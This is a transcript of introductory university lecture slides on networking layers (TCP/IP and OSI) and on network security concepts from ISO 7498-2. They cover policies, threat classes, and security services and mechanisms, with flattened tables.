Networking and Network Security

Download Report

Transcript Networking and Network Security

Network Security
Lecture 1, Part 1
Introduction to Networking
1
Objectives of Lecture
CINS/F1-01
• Show how networks can be understood using a
layered approach.
• Introduce the OSI seven layer reference model.
• Introduce the concepts of internetworking and
routing.
• Understand the difference between network
protocols and services.
2
Contents
1.1
1.2
1.3
1.4
Extended example: how the Internet
protocols fetch a web page
The concept of protocol layering
Internetworking and routing
The OSI seven layer model
3
1.1 Internet Protocols
How does a web browser application
retrieve data from a web server?
Web Server
Network
Web Browser
4
Application Layer
• Users invoke applications which “speak” using
application protocol.
• Applications interact with a transport protocol to
send or receive data.
• Application protocol in our example: Hypertext
Transfer Protocol (HTTP).
• Other application protocols: FTP, SMTP, DNS,
SMB, …
5
Application Layer Example
• HTTP outline:
– GET /directory/dirsearch.html HTTP/1.1
– Host: news.bbc.co.uk
– Other fields also included (e.g. client application
identifier, encoding methods,…)
HTTP Message
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
6
Transport Layer
• Provides end-to-end communication between
applications.
• Transport Protocol: Transport Control Protocol (TCP)
– a reliable, connection-oriented transport protocol.
• Divides stream of application messages into packets.
• Interacts with Internet Layer to send or receive data.
• In general, a transport protocol may be
– reliable or unreliable,
– connection-oriented or connectionless,
– and flow may or may not be regulated.
• Others: UDP, ICMP.
7
Transport Layer Example
• TCP outline:
–
–
–
–
Source Port: 1081
Destination Port: 80
Checksum: 0xa858
Other header fields and payload
TCP header
Src: 1081 Dst: 80
Chksum: 0xa858
TCP payload
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
HTTP Message
8
Internet Layer
• Responsible for routing communications
between one machine and another.
• Accepts requests to send packets to
destination address.
• Internet Protocol (IP) encapsulates packets in
IP datagram with IP header and uses routing
algorithm to decide whether to send directly or
indirectly.
9
Internet Layer Example
• IP outline:
–
–
–
–
–
Time to live: 128
Header checksum: 0x57d1
Source: pelican (192.168.0.40)
Destination: news.bbc.co.uk (192.168.0.50)
Other header fields and payload
IP payload
IP datagram header
Src: 192.168.0.40
Dst: 192.168.0.50 TTL: 128
Src: 1081 Dst: 80
Chksum: 0xa858
TCP header
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
HTTP Message
10
Network Interface Layer
• Accepts IP datagrams and prepares for
transmission over specific physical network.
• Maybe a simple device driver (e.g. an Ethernet
driver) or a complex subsystem with further
data link protocols (e.g. in an ATM network).
• Output of network interface layer is a signal
suitable for transmission on a particular
physical medium.
11
Network Interface Layer Example
• Ethernet outline:
–
–
–
–
Destination: 00:a0:cc:54:1d:4e
Source: 00:e0:81:10:19:fc
Type: IP
Other header fields and payload
Ethernet Frame
Src: 00:e0:81:10:19:fc Dst: 00:a0:cc:54:1d:4e Type: IP
Src: 192.168.0.40
Dst: 192.168.0.50 TTL: 128
Src: 1081 Dst: 80
Chksum: 0xa858
GET /directory/dirsearch.html HTTP/1.1
Host: news.bbc.co.uk
12
Physical Layer
• A layer representing the actual communications
medium.
– Could be an ethernet cable, optical fibre, wireless
link, telephone wire or even a carrier pigeon
(http://www.ietf.org/rfc/rfc1149.txt)
– Sometimes not considered as a separate layer in
TCP/IP networking; sometimes not considered part
of TCP/IP at all.
– Thus creating confusion over whether there are
really 4 or 5 layers in TCP/IP.
13
At The Server
• The server contains a set of layers matching those at
the client:
– The physical signal is presented to the server’s network
interface layer which reconstructs the ethernet frame.
– The network interface layer extracts an IP datagram and
passes it up to the Internet layer.
– The Internet layer checks the datagram, extracts a TCP
segment and passes it up to the transport layer.
– The transport layer checks for errors and passes the TCP
payload (an http message) onto the application layer.
– The web server at the application layer receives the http
message and processes it.
• Return messages from web server to web browser are
handled in the same way.
14
1.2 Protocol Layering
Host A
Host B
Application Layer
Application Layer
Message
Transport Layer
Transport Layer
Packet
Internet Layer
Internet Layer
Datagram
Network Interface
Layer
Frame
Network Interface
Layer
Physical Network
15
Protocol Layering
Web Browser
Web Server
Application Layer
Application Layer
HTTP Message
Transport Layer
Transport Layer
TCP Packet
Internet Layer
Internet Layer
IP Datagram
Network Interface
Layer
Ethernet Frame
Network Interface
Layer
Physical Network
16
Protocol Hierarchies
• Protocols are stacked vertically as series of
‘layers’.
• Each layer offers services to layer above
through an interface, shielding implementation
details.
• Layer n on one machine communicates with
layer n on another machine (they are peer
processes/entities) using Layer n Protocol.
• The entire hierarchy is called a protocol stack
– e.g. the TCP/IP protocol stack
17
Layers, Protocols & Interfaces
Layer n/n+1
interface
Layer n
Layer n protocol
Layer n/n+1
interface
Layer n
Layer n-1/n
interface
Layer 2/3
interface
Layer 2
Layer 1/2
interface
Layer 1
Layer n-1/n
interface
Layer 2 protocol
Layer 1 protocol
Layer 2/3
interface
Layer 2
Layer 1/2
interface
Layer 1
Physical communications medium
18
Layer and Interface Design
• An important design objective is ‘clean’
interfaces, having minimal set of well-defined
services.
• Use of protocol layering and clean-cut
interfaces enables:
– easy replacement of individual layers
– designers and implementers to focus on solving one
sub-problem at a time
– independent implementations of the same layer to
inter-operate
– minimisation of inter-layer communications
– diagnosis of faults, errors, congestion,…
19
Virtual & Actual Communications
• Important to understand difference between:
– virtual and actual communications,
– protocols and interfaces.
• Peer processes ‘think’ of communications as
being ‘horizontal’ using protocol.
• Actual communications is via interfaces (and
the physical communications medium).
• Peer process idea is key to network design.
20
Protocol Layering – The Downside
• Protocol layering does not solve all networking
problems!
• Some issues need to be addressed at many
layers, e.g:
–
–
–
–
–
–
–
need to address data (say who it’s for),
possible need for setting up connections,
data transfer rules (simplex, half-duplex, ...),
error management,
deal with message component re-ordering,
flow control,
routing.
• Layering can introduce inefficiencies.
21
1.3 Internetworking and Routing
• No single networking technology can satisfy all
requirements.
• Universal interconnection is desired.
• Protocols allow communication between nodes
without understanding underlying mechanisms.
• Internetworking is the process by which a
group of disparate, heterogenous networks can
be linked to form a single logical network.
• The Internet is just such a collection
– universal interconnection is achieved through use of
coordination of IP addressing and use of IP protocol.
22
Routing
Routing is the mechanism used to transfer data
between networks to reach the correct
destination.
Router
Network
B
Web Server
Network
A
Web Browser
In TCP/IP, routing takes place
at the IP layer: routers are not
aware of transport and
application layers.
23
Protocol Layering and Routing
Host A
Host B
Application Layer
Application Layer
HTTP Message
Transport Layer
Transport Layer
TCP Packet
Router
Internet Layer
Internet Layer
IP Datagram
NetworkInterface
Ethernet
Frame
Internet Layer
IP Datagram
Network Layer
Physical Network
Ethernet
Frame
Network Interface
Physical Network
24
1.4 The OSI Reference Model
• OSI Reference Model – an internationally
standardised network architecture.
• An abstract representation of an ideal network
protocol stack; not used in real networks.
• OSI = Open Systems Interconnection.
• Specified in ISO 7498-1.
• Model has 7 layers.
25
The OSI Model
Layer 7
Application Layer
Layer 6
Presentation Layer
Layer 5
Session Layer
Layer 4
Transport Layer
Layer 3
Network Layer
Layer 2
Data Link Layer
Layer 1
Physical Layer
26
Lower/Upper Layers
• Layers 1-4 often referred to as lower layers.
• Layers 5-7 are the upper layers.
• Lower layers relate more closely to the
communications technology.
• Layers 1 – 3 manage the communications
subnet.
– the entire set of communications nodes required to
manage comms. between a pair of machines.
• Layers 4 – 7 are true ‘end-to-end’ protocols.
• Upper layers relate to application.
27
Layer 7: Application Layer
• Home to wide variety of protocols for specific
user needs, e.g.:
–
–
–
–
virtual terminal service,
file transfer,
electronic mail,
directory services.
28
Layer 6: Presentation Layer
• Concerned with representation of transmitted
data.
• Deals with different data representations.
–
–
–
–
ASCII or EBCDIC,
one’s complement or two’s complement,
byte ordering conventions,
floating point conventions (IEEE or proprietary).
• Also deals with data compression.
29
Layer 5: Session Layer
• Allows establishment of sessions between
machines, e.g. to
– allow remote logins
– provide file transfer service.
• Responsible for:
– dialogue control
• which entity sends when with half-duplex communications.
– token management
• E.g. control which entity can perform an operation on
shared data.
– synchronisation
• E.g. insertion of checkpoints in large data transfers.
30
Layer 4: Transport Layer
• Basic function is to take data from Session
Layer, split it up into smaller units, and ensure
that the units arrive correctly.
• Concerned with efficient provision of service.
– maybe multiple connections per session or multiple
sessions per connection.
• The Transport Layer also determines the ‘type
of service’ to provide to the Session Layer.
– most commonly, error-free, point-to-point, with
guarantee of correct ordering of data.
– could be transport of isolated messages only (no
ordering guarantees) or broadcast.
31
Layer 3: Network Layer
• Provides uniform addressing scheme for
network addresses.
• Shields upper layers from details of lower
layers.
• A key responsibility is control of routing.
• Routing can be based on:
– static tables,
– determined at start of session,
– highly dynamic (varying for each packet depending
on network load).
• Also responsible for congestion control and
usage monitoring.
32
Layer 2: Data Link Layer
• Provides reliable, error-free service on top of
raw Layer 1 service.
– corrects errors at the ‘bit’ level.
• Breaks data into frames.
– requires creation of frame boundaries using special
bit sequences.
• Frames used to manage errors via
acknowledgements and selective frame
retransmission.
33
Layer 1: Physical Layer
• Concerned with bit transmission over physical
channel.
• Issues include:
– definition of 0/1,
– whether channel simplex/duplex,
– connector design.
• Mechanical, electrical, procedural matters.
34
Internet Protocols vs OSI
5
Application
Application
7
Presentation
6
Session
5
4
3
TCP
Transport
4
IP
Network
3
2
Network Interface
Data Link
2
1
Hardware
Physical
1
35
Services in the OSI Model
• In OSI model, each layer provide services to
layer above, and ‘consumes’ services provided
by layer below.
• Active elements in a layer are called entities.
• Entities in same layer in different machines are
called peer entities.
36
Services and Protocols
• Service = set of primitives provided by one
layer to layer above.
• Service defines what layer can do (but not how
it does it).
• Protocol = set of rules governing data
communication between peer entities, i.e.
format and meaning of frames/packets.
• Service/protocol decoupling very important.
37
Layering Principles
n+1
PDU
(n+1) Entity
Service User
SDU
(n) Entity
Service Provider
Layer n+1 protocol
Layer n Service
Access Point (SAP)
Layer n protocol
(n+1) Entity
Service User
(n) Entity
Service Provider
n
PDU
PDU - Protocol Data Unit
SDU - Service Data Unit
38
Connections
• Layers can offer connection-oriented or
connectionless services.
• Connection-oriented like telephone system.
• Connectionless like postal system.
– not all applications need connections.
• Each service has an associated Quality-ofservice (e.g. reliable or unreliable).
39
Reliability Issues
• Reliable services never lose/corrupt data.
• Reliable service costs more.
• Typical application for reliable service is file
transfer.
• Typical application not needing reliable service
is voice traffic.
40
IC3 - Network Security
Lecture 1, Part 2
Introduction to Network Security
41
Objectives of Lecture
CINS/F1-01
• Understand why security should be a
fundamental consideration when designing and
operating networks.
• Examine the primary enabling threats and
fundamental threats to security for networks.
• Introduce security services and mechanisms,
and show how they can be used to counter
threats.
• Study the provision of security services at
different network layers in ISO7498-2.
42
Contents
1.5
1.6
1.7
1.8
1.9
Why network security?
Security policies for networks
Security threats for networks
Security services and mechanisms
Security services and layers
43
1.5 Why Network Security?
• Organisations and individuals are increasingly reliant
on networks of all kinds for day-to-day operations:
– e-mail used in preference to letter, fax, telephone for many
routine communications.
– B2B and C2B e-commerce still growing rapidly.
– the Internet is a vast repository of information of all kinds:
competitors and their prices, stock markets, cheap flights,….
– increased reliance on networks for supply chains of all kinds:
from supermarkets to aircraft components.
– utility companies control plant, banks move money,
governments talk to citizens over networks.
– growth of mobile telephony for voice and data.
44
Why Network Security?
• Networks are becoming increasingly inter-connected
and their security consequently more complex:
– if I send sensitive data over my internal network, then who else
can see it or even alter it? My employees? My competitors?
– can a hacker who gets into my internal network then get
access to other resources (computer accounts, stored data)?
Can he use my network as a stepping-off point for further
attacks? I am then liable?
– a compelling Internet presence is essential for my company,
but if someone can see my website, can they alter it too?
– how can consumers trust that a given website is that of a
reputable company and not one who will mis-use their credit
card details?
45
Why Network Security?
• Safeguarding the confidentiality, integrity and
availability of data carried on these various networks is
therefore essential.
• Authenticity and accountability are often also important:
who did what and when?
• It’s not only about security of Internet-connected
systems.
– Insider threats are often more potent than threats originating on
the Internet.
• It’s not only about TCP/IP networks.
– Many networks use special-purpose protocols and
architectures.
– However TCP/IP dominates in LANs and the Internet.
46
1.6 Security Policies for Networks
• In this and the following sections, we follow the
approach of ISO7498-2
– a companion document to ISO7498-1 (the seven
layer model),
– provides a useful overview of the security issues
pertinent to networks,
– equips us with a handy set of definitions to fix our
terminology.
47
Security Policies for Networks
• In a secure system, the rules governing
security behaviour should be made explicit in
the form of an Information Security Policy.
• Security policy: ‘the set of criteria for the
provision of security services’
– essentially, a set of rules
– may be very high level or quite detailed.
• Security domain: the scope of application of a
security policy.
– where, to what information and to whom the policy
applies.
48
Security Policies for Networks
• A network security policy should interpret the
overall Information Security Policy in the
context of the networked environment:
• Defines what is the responsibility of the network
and what is not.
• Describes what security is to be available from
the network.
• Describes rules for using the network.
• Describes who is responsible for the
management and security of the network.
49
Generic Security Policy
• A generic authorisation policy (from ISO 74982):
‘Information may not be given to, accessed by, nor
permitted to be inferred by, nor may any resource be
used by, those not appropriately authorised.’
• Possible basis for more detailed policy: needs
lots of refinement to produce final document:
–
–
–
–
What information?
What resources?
Who is authorised and for what?
What about availability?
50
The Security Life-Cycle
• A generic model for the security life-cycle,
including network security issues, is as follows:
– define security policy,
– analyse security threats (according to policy) and
associated risks, given existing safeguards,
– define security services to meet/reduce threats, in
order to bring risks down to acceptable levels,
– define security mechanisms to provide services,
– provide on-going management of security.
• Security policy in general will be covered in
more detail in IC1.
51
1.7 Security Threats for Networks
• A threat is:
– a person, thing, event or idea which poses some
danger to an asset (in terms of confidentiality,
integrity, availability or legitimate use).
– a possible means by which a security policy may be
breached.
• An attack is a realisation of a threat.
• Safeguards are measures (e.g. controls,
procedures) to protect against threats.
• Vulnerabilities are weaknesses in safeguards.
52
Risk
• Risk is a measure of the cost of a vulnerability
(taking into account probability of a successful
attack).
• Risk analysis determines whether expenditure
on new or better safeguards is warranted.
• Risk analysis can be quantitative or qualitative.
• Risk analysis will be covered in more detail in
IC1.
53
Threats
Threats can be classified as:
• deliberate (e.g. hacker penetration);
• accidental (e.g. a sensitive file being sent to the
wrong address).
Deliberate threats can be further sub-divided:
• passive (e.g. monitoring, wire-tapping);
• active (e.g. changing the value of a financial
transaction).
• In general passive threats are easier to realise
than active ones.
54
Fundamental Threats
• Four fundamental threats (matching four
‘standard’ security goals: confidentiality,
integrity, availability, legitimate use):
–
–
–
–
Information leakage,
Integrity violation,
Denial of service,
Illegitimate use.
(There are other ways to classify threats)
55
Fundamental Threat Examples
• Information Leakage
– Prince Charles mobile phone calls, 1993.
• Integrity violation
– USA Today, falsified reports of missile attacks on
Israel, 7/2002.
• Denial of service
– Yahoo, 2/2000, 1Gbps.
– http://grc.com/dos/grcdos.htm
• Illegitimate use
– Cloning of first generation mobile phone identities.
– Phone phreaking.
56
Primary Enabling Threats
• Realisation of any of these primary enabling
threats can lead directly to a realisation of a
fundamental threat:
–
–
–
–
–
Masquerade,
Bypassing controls,
Authorisation violation,
Trojan horse,
Trapdoor.
• First three are penetration threats, last two are
planting threats.
57
Primary Enabling Threat Examples
• Masquerade
– Royal Opera House web site, 8/2002 – Information Leakage
– Phishing attacks on on-line bank accounts – Illegitimate Use
• Bypassing controls
– ADSL modem passwords – Illegitimate Use
• Authorisation violation
– Students running mp3 download site from University
computers – Illegitimate Use
• Trojan horse
– PWSteal.Trojan, 1999 – Information Leakage
• Trapdoor
– Ken Thompson, Unix login – Reflections on Trusting Trust,
1975 - Illegitimate Use
58
1.8 Security Services and Mechanisms
• A security threat is a possible means by which
a security policy may be breached (e.g. loss of
integrity or confidentiality).
• A security service is a measure which can be
put in place to address a threat (e.g. provision
of confidentiality).
• A security mechanism is a means to provide a
service (e.g. encryption, digital signature).
59
Security Service Classification
• Security services in ISO 7498-2 are a special class of
safeguard applying to a communications environment.
• Five main categories of security service:
– Authentication (including entity authentication and
origin authentication),
– Access control,
– Data confidentiality,
– Data integrity,
– Non-repudiation.
• Sixth category: “other” – includes physical security,
personnel security, computer security, life-cycle
controls,…
60
Authentication
• Entity authentication provides checking of a
claimed identity at a point in time.
• Typically used at start of a connection.
• Addresses masquerade and replay threats.
• Origin authentication provides verification of
source of data.
• Does not protect against replay or delay.
• Lots of examples in Lectures 4, 5 and 6 on
secure protocols.
61
Access Control
• Provides protection against unauthorised use
of resource, including:
– use of a communications resource,
– reading, writing or deletion of an information
resource,
– execution of a processing resource.
• Example: file permissions in Unix/NT file
systems.
62
Data Confidentiality
• Protection against unauthorised disclosure of
information.
• Four types:
–
–
–
–
Connection confidentiality,
Connectionless confidentiality,
Selective field confidentiality,
Traffic flow confidentiality.
• Example: encrypting routers as part of Swift
funds transfer network.
• Example: winnowing and chaffing
(http://theory.lcs.mit.edu/~rivest/chaffing.txt).
63
Data Integrity
• Provides protection against active threats to the
validity of data.
• Five types:
–
–
–
–
–
Connection integrity with recovery,
Connection integrity without recovery,
Selective field connection integrity,
Connectionless integrity,
Selective field connectionless integrity.
• Example: MD5 hashes on software at
http://www.apache.org/dist/httpd/binaries/linux/
• Example: AH protocol in IPSec (Lecture 5).
64
Non-repudiation
• Protects against a sender of data denying that
data was sent (non-repudiation of origin).
• Protects against a receiver of data denying that
data was received (non-repudiation of delivery).
• Example: analagous to signing a letter and
sending via recorded delivery.
• Example: signatures in S/MIME secure e-mail
system (Lecture 9).
65
Security Mechanisms
• Exist to provide and support security services.
• Can be divided into two classes:
– Specific security mechanisms, used to provide
specific security services, and
– Pervasive security mechanisms, not specific to
particular services.
66
Specific Security Mechanisms
• Eight types:
–
–
–
–
–
–
–
–
encipherment,
digital signature,
access control mechanisms,
data integrity mechanisms,
authentication exchanges,
traffic padding,
routing control,
notarisation.
67
Specific Mechanisms 1
• Encipherment mechanisms = encryption
algorithms.
– Can provide data and traffic flow confidentiality.
– Covered in detail in IC2
• Digital signature mechanisms
– signing procedure (private),
– verification procedure (public).
– Can provide non-repudiation, origin authentication
and data integrity services.
– Also addressed in detail in IC2
• Both can be basis of some authentication
exchange mechanisms.
68
Specific Mechanisms 2
• Access Control mechanisms
– A server using client information to decide whether
to grant access to resources
• E.g. access control lists, capabilities, security labels.
– A major topic in IC4
• Data integrity mechanisms
– Protection against modification of data.
• Provide data integrity and origin authentication services.
Also basis of some authentication exchange mechanisms.
– Discussed further in IC2
• Authentication exchange mechanisms
– Provide entity authentication service.
– Covered in detail in IC3 Lecture 4.
69
Specific Mechanisms 3
• Traffic padding mechanisms
– The addition of ‘pretend’ data to conceal real volumes of data
traffic.
– Provides traffic flow confidentiality.
• Routing control mechanisms
– Used to prevent sensitive data using insecure channels.
– E.g. route might be chosen to use only physically secure
network components.
• Notarisation mechanisms
– Integrity, origin and/or destination of data can be guaranteed by
using a 3rd party trusted notary.
• Notary typically applies a cryptographic transformation to the data.
70
Pervasive Security Mechanisms
• Five types identified:
–
–
–
–
–
trusted functionality,
security labels,
event detection,
security audit trail,
security recovery.
71
Pervasive Mechanisms 1
• Trusted functionality
– Any functionality providing or accessing security
mechanisms should be trustworthy.
– May involve combination of software and hardware.
• Security labels
– Any resource (e.g. stored data, processing power,
communications bandwidth) may have security label
associated with it to indicate security sensitivity.
– Similarly labels may be associated with users.
Labels may need to be securely bound to
transferred data.
72
Pervasive Mechanisms 2
• Event detection
– Includes detection of
• attempted security violations,
• legitimate security-related activity.
– Can be used to trigger event reporting (alarms), event logging,
automated recovery.
• Security audit trail
– Log of past security-related events.
– Permits detection and investigation of past security breaches.
• Security recovery
– Includes mechanisms to handle requests to recover from
security failures.
– May include immediate abort of operations, temporary
invalidation of an entity, addition of entity to a blacklist.
73
Services Versus Mechanisms
• ISO 7498-2 indicates which mechanisms can
be used to provide which services.
• Illustrative NOT definitive.
• Omissions include:
– use of integrity mechanisms to help provide
authentication services,
– use of encipherment to help provide non-repudiation
service (as part of notarisation).
74
Service/Mechanism Table 1
Mechanism Encipherment
Y
Y
Service
Entity authentication
Origin authentication
Access control
Connection confidentiality
Connectionless confidentiality
Selective field confidentiality
Traffic flow confidentiality
Connection integrity with recovery
Connection integrity without recovery
Selective field connection integrity
Connectionless integrity
Selective field connectionless integrity
Non-repudiation of origin
Non-repudiation of delivery
Digital
sign.
Y
Y
Access
Control
Data
integrity
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
75
Service/Mechanism Table 2
Mechanism Auth.
exchange
Y
Service
Entity authentication
Origin authentication
Access control
Connection confidentiality
Connectionless confidentiality
Selective field confidentiality
Traffic flow confidentiality
Connection integrity with recovery
Connection integrity without recovery
Selective field connection integrity
Connectionless integrity
Selective field connectionless integrity
Non-repudiation of origin
Non-repudiation of delivery
Traffic
padding
Routing
Control
Notarisation
Y
Y
Y
Y
Y
Y
76
1.9 Security Services And Layers
• ISO 7498-2 lays down which security services
can be provided in which of the 7 layers.
• Layers 1 and 2 may only provide confidentiality
services.
• Layers 3/4 may provide many services.
• Layer 7 may provide all services.
• A set of principles dictate which services
can/should be provided at which layers.
• We’ll return to this issue in Lectures 5 and 6.
77
Service/Layer Table
Layer
Service
Entity authentication
Origin authentication
Access control
Connection confidentiality
Connectionless confidentiality
Selective field confidentiality
Traffic flow confidentiality
Connection integrity with recovery
Connection integrity without recovery
Selective field connection integrity
Connectionless integrity
Selective field connectionless integrity
Non-repudiation of origin
Non-repudiation of delivery
Layer
1
Layer
2
Y
Y
Y
Y
Layer
3
Y
Y
Y
Y
Y
Layer
4
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Layer
5/6
Layer
7
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
Y
78